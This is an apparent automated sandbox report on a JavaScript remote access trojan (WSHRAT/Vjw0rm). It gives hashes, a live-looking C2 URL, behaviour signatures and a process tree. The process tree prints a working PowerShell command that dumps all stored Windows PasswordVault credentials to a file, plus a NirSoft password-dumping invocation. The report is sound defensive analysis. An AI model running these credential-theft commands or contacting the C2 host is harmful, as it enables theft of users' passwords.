Analysis

  • max time kernel
    71s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-11-2022 08:16

General

  • Target

    FCR22001306.js

  • Size

    268KB

  • MD5

    d873c25379f94f8a1803f4c968befaf6

  • SHA1

    13293c020e2eec88e5627a44ec8eafa3b0d0f6ab

  • SHA256

    da581bea8917ae4b052e9978b8264b3257e06d80b2973c29e80cdf216a8640c4

  • SHA512

    d3ee46a7e61496230bb65082b5c07c4641c965ed523471d548bd1694e7df0f8d6c5c851f99dba5a981454224cdeac4ba0f1ed30266d8235d11e111db983be062

  • SSDEEP

    3072:xGFYHhbq8fCQFiem5yBmExNr2sBB1fbNQnTXFEZhRZfUQ0jShn8nc2KVHybnuRAL:sF8fCQHWsBBJpYEPfM3jY2+4CAU9i

Malware Config

Extracted

Family

wshrat

C2

http://egodds.longmusic.com:2084

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • Nirsoft 2 IoCs
  • Blocklisted process makes network request 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 2 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1128
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js"
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      PID:4380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
      2⤵
        PID:2336
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
        2⤵
          PID:3196
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM cmdc.exe
            3⤵
            • Kills process with taskkill
            PID:4952
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
          2⤵
            PID:732
          • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
            "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
            2⤵
              PID:4024
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
              2⤵
                PID:3236
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM cmdc.exe
              1⤵
              • Kills process with taskkill
              PID:1680

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\cmdc.cfg

              Filesize

              373B

              MD5

              70e69155b8080b5db35191ab8426d084

              SHA1

              383deaaee90ce71b28b0a6e22124e77aa1cccf8b

              SHA256

              104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe

              SHA512

              c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342

            • C:\Users\Admin\AppData\Local\Temp\cmdc.exe

              Filesize

              100KB

              MD5

              54e8ded7b148a13d3363ac7b33f6eb06

              SHA1

              63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9

              SHA256

              400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342

              SHA512

              bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

            • C:\Users\Admin\AppData\Local\Temp\cmdc.exe

              Filesize

              100KB

              MD5

              54e8ded7b148a13d3363ac7b33f6eb06

              SHA1

              63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9

              SHA256

              400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342

              SHA512

              bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

            • C:\Users\Admin\AppData\Local\Temp\tmp.txt

              Filesize

              1KB

              MD5

              c416c12d1b2b1da8c8655e393b544362

              SHA1

              fb1a43cd8e1c556c2d25f361f42a21293c29e447

              SHA256

              0600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046

              SHA512

              cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c

            • C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js

              Filesize

              10KB

              MD5

              18aa18aca1d624556d87fd1c3c8dfc4a

              SHA1

              45509a074cd5f5d11d507a7fe0bcb733f874e90d

              SHA256

              27765e27d897d45fb5cc093197a65545ed4a120130e12cc88e70f41e68788036

              SHA512

              80e7fcc1551290772a960b76445999f85f5cbef24cf2b860c7d8e0e7ea1a2a284e8b120a203947c2e8f2cdff13193095c00922e6f7e7cc94069e8846bad4554a

            • memory/2336-138-0x000002147CB80000-0x000002147CB88000-memory.dmp

              Filesize

              32KB

            • memory/2336-139-0x00007FFAD8B90000-0x00007FFAD9651000-memory.dmp

              Filesize

              10.8MB

            • memory/2336-137-0x00007FFAD8B90000-0x00007FFAD9651000-memory.dmp

              Filesize

              10.8MB

            • memory/2336-136-0x000002147B250000-0x000002147B25A000-memory.dmp

              Filesize

              40KB

            • memory/2336-135-0x000002147B220000-0x000002147B242000-memory.dmp

              Filesize

              136KB